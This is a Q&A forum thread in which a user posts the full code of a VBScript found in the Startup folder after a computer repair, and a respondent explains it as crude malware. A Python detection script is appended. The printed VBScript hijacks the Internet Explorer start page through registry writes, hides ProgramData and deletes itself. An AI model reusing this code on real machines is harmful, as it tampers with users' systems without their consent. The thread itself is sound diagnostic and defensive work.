
vbscript - What does this Visual Basic Script called uh.vbs do?

Problem description:

Not long ago I sent my computer away for some off-warranty work (the BIOS was not recognizing one of my HDD bays) and when it came back with a new HDD board, I was getting an odd error while rebooting.

Eventually I figured out that there was a new file, called "uh.vbs", in the Windows startup folder, and there was an error when it was run upon boot. Not knowing anything about vbs I have no idea what this file does, beyond that it was either created or modified while my computer was in the repair shop. I notice that it points to a couple webpages, and has some Chinese characters, so I'm hoping that one of the well-versed people on this site can fill me in. Below is the code...

Edit: I had to take a bunch of it out because of a strange error apparently caused by Chinese characters, which is not identified by the site and which took me half an hour to eventually figure out. I deleted the Chinese-looking characters and put MISSING_CHINESE_CHARACTERS everywhere I took them out.

On Error Resume Next
set lhwy=createobject("wscript.shell")
path="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\Start Page"
tf=lhwy.regwrite(path,"http://home.yy8000.com/")
set path=nothing
path="HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"
tf=lhwy.regwrite(path,"http://home.yy8000.com/")

WScript.Sleep(30000)
set lhwy=createobject("wscript.shell")
path="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\Start Page"
tf=lhwy.regwrite(path,"http://home.yy8000.com/")
set path=nothing
path="HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"
tf=lhwy.regwrite(path,"http://home.yy8000.com/")

Dim objws,objfso,dn
Set objws=WScript.CreateObject("wscript.shell")
Set objfso=CreateObject("scripting.filesystemobject")
dn=objfso.GetDriveName(WScript.ScriptFullName)
objws.run "attrib +h " & dn & "\ProgramData",0

Set fso = CreateObject("Scripting.FileSystemObject")
WScript.Sleep 3000 'MISSING_CHINESE_CHARACTERS
fso.DeleteFile(WScript.ScriptName) 'MISSING_CHINESE_CHARACTERS
If fso.FileExists("\Documents and Settings\All Users\MISSING_CHINESE_CHARACTERS\uh.VBS") Then
  fso.DeleteFile("\Documents and Settings\All Users\MISSING_CHINESE_CHARACTERS\uh.VBS") 'MISSING_CHINESE_CHARACTERS
end if

Set fso = CreateObject("Scripting.FileSystemObject")
WScript.Sleep 1000 'MISSING_CHINESE_CHARACTERS
fso.DeleteFile(WScript.ScriptName) 'MISSING_CHINESE_CHARACTERS
If fso.FileExists("\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uh.VBS") Then
  fso.DeleteFile("\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uh.VBS") 'MISSING_CHINESE_CHARACTERS
end if

Wscript.quitPAPK

Thanks for any input.

Answer from a user:

It seems to be a relatively poor attempt at malware.

This bit is trying to set your IE start page to http://home.yy8000.com/ -

path="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\Start Page"
tf=lhwy.regwrite(path,"http://home.yy8000.com/")
set path=nothing
path="HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"
tf=lhwy.regwrite(path,"http://home.yy8000.com/")

Then the next bit waits 30 seconds before doing it again (the writer probably thought there was a chance the registry would be inaccessible when the script first runs).

This next bit is a little odd, it hides the ProgramData folder (which in most cases will be hidden anyway) -

Dim objws,objfso,dn
Set objws=WScript.CreateObject("wscript.shell")
Set objfso=CreateObject("scripting.filesystemobject")
dn=objfso.GetDriveName(WScript.ScriptFullName)
objws.run "attrib +h " & dn & "\ProgramData",0

The section with the unusual characters simply deletes the script once it's done its "damage".

Set fso = CreateObject("Scripting.FileSystemObject")
WScript.Sleep 3000 'MISSING_CHINESE_CHARACTERS
fso.DeleteFile(WScript.ScriptName) 'MISSING_CHINESE_CHARACTERS
If fso.FileExists("\Documents and Settings\All Users\MISSING_CHINESE_CHARACTERS\uh.VBS") Then
  fso.DeleteFile("\Documents and Settings\All Users\MISSING_CHINESE_CHARACTERS\uh.VBS") 'MISSING_CHINESE_CHARACTERS
end if


Set fso = CreateObject("Scripting.FileSystemObject")
WScript.Sleep 1000 'MISSING_CHINESE_CHARACTERS
fso.DeleteFile(WScript.ScriptName) 'MISSING_CHINESE_CHARACTERS
If fso.FileExists("\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uh.VBS") Then
  fso.DeleteFile("\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uh.VBS") 'MISSING_CHINESE_CHARACTERS
end if

My suspicion would be that the people who did the repair plugged a USB stick into your computer that had previously been plugged into another repair. The file had been copied automatically onto the USB and then onto your computer when they plugged it in.

Delete the file and do a virus check. The malware attempt is so poor this simple script may be hiding a bigger issue. I've seen scripts like this in the past where there is another process running that creates the script file (possibly during shutdown).

Look at Kaspersky's live CD if you didn't have a virus checker installed before sending your PC in for warranty.
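
An added example, not part of the original answer or of the script: a small Python static triage that flags the behaviours the answer walks through (the IE start page RegWrite, attrib +h, self-deletion, and the Startup folder reference). The function names and finding labels are assumptions made for this example; the sample input reuses lines from the script quoted in the question.

```python
import re

ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$')
REGWRITE = re.compile(r'\.regwrite\s*\(?\s*(\w+|"[^"]*")\s*,\s*"([^"]*)"', re.I)
START_PAGE = r"internet explorer\main\start page"
SIMPLE = [  # (pattern, finding) pairs for the other behaviours the answer describes
    (re.compile(r"attrib\s+\+h", re.I), "hides a path with attrib +h"),
    (re.compile(r"\.DeleteFile\s*\(\s*WScript\.Script(Full)?Name", re.I), "deletes itself"),
    (re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I), "references the Startup folder"),
]

def strip_comment(line):
    """Drop a trailing VBScript ' comment, ignoring apostrophes inside strings."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line

def triage(source):
    """Return (line_no, finding) tuples for one VBScript source text."""
    strings, findings = {}, []
    for no, raw in enumerate(source.splitlines(), 1):
        line = strip_comment(raw).strip()
        m = ASSIGN.match(line)
        if m:  # remember name="literal" so RegWrite(name, ...) can be resolved
            strings[m.group(1).lower()] = m.group(2)
        m = REGWRITE.search(line)
        if m:
            arg = m.group(1)
            key = arg.strip('"') if arg.startswith('"') else strings.get(arg.lower(), "?")
            if key.lower().endswith(START_PAGE):
                findings.append((no, "sets IE start page to " + m.group(2)))
            else:
                findings.append((no, "registry write to " + key))
        findings += [(no, label) for rx, label in SIMPLE if rx.search(line)]
    return findings

# Lines taken from the script quoted in the question, assembled as sample input.
SAMPLE = r'''path="HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"
tf=lhwy.regwrite(path,"http://home.yy8000.com/")
objws.run "attrib +h " & dn & "\ProgramData",0
fso.DeleteFile(WScript.ScriptName) 'MISSING_CHINESE_CHARACTERS
If fso.FileExists("\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uh.VBS") Then
'''

print(*triage(SAMPLE), sep="\n")
```

This only matches literal text and simple name="literal" assignments; it does not resolve concatenated or encoded strings, so an empty result does not mean a script is harmless.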
